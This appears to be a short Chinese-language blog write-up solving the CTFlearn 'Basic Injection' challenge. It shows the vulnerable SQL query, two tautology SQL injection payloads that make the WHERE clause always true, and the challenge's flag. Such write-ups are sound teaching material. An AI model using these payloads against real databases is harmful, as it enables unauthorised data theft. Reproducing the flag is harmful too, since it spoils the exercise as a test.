CTFlearn - Basic Injection (#88)
2024-06-28 13:38:38

挑戰網站

https://ctflearn.com/challenge/88

題目

See if you can leak the whole database using what you know about SQL Injections. link

作法

網站中有提示到 Original Query: SELECT * FROM webfour.webfour where name = '$input',又有提到目的是 leak 出所有資料庫資料,所以我們只要嘗試讓 where name 的變數為 True 就好。

Input 資料可以是以下幾種常見的,都可以讓其恆成立

  • ' or '' = 'Your Resulting Query: SELECT * FROM webfour.webfour where name = '' or '' = ''
  • ' or '0' = '0Your Resulting Query: SELECT * FROM webfour.webfour where name = '' or '0' = '0'

輸入後便可 print 出所有 SQL 資料

最終解答

你會注意到輸入後會打印其中一個使用者資料

1
2
Name: fl4g__giv3r
Data: CTFlearn{th4t_is_why_you_n33d_to_sanitiz3_inputs}

這就是這題的解答了!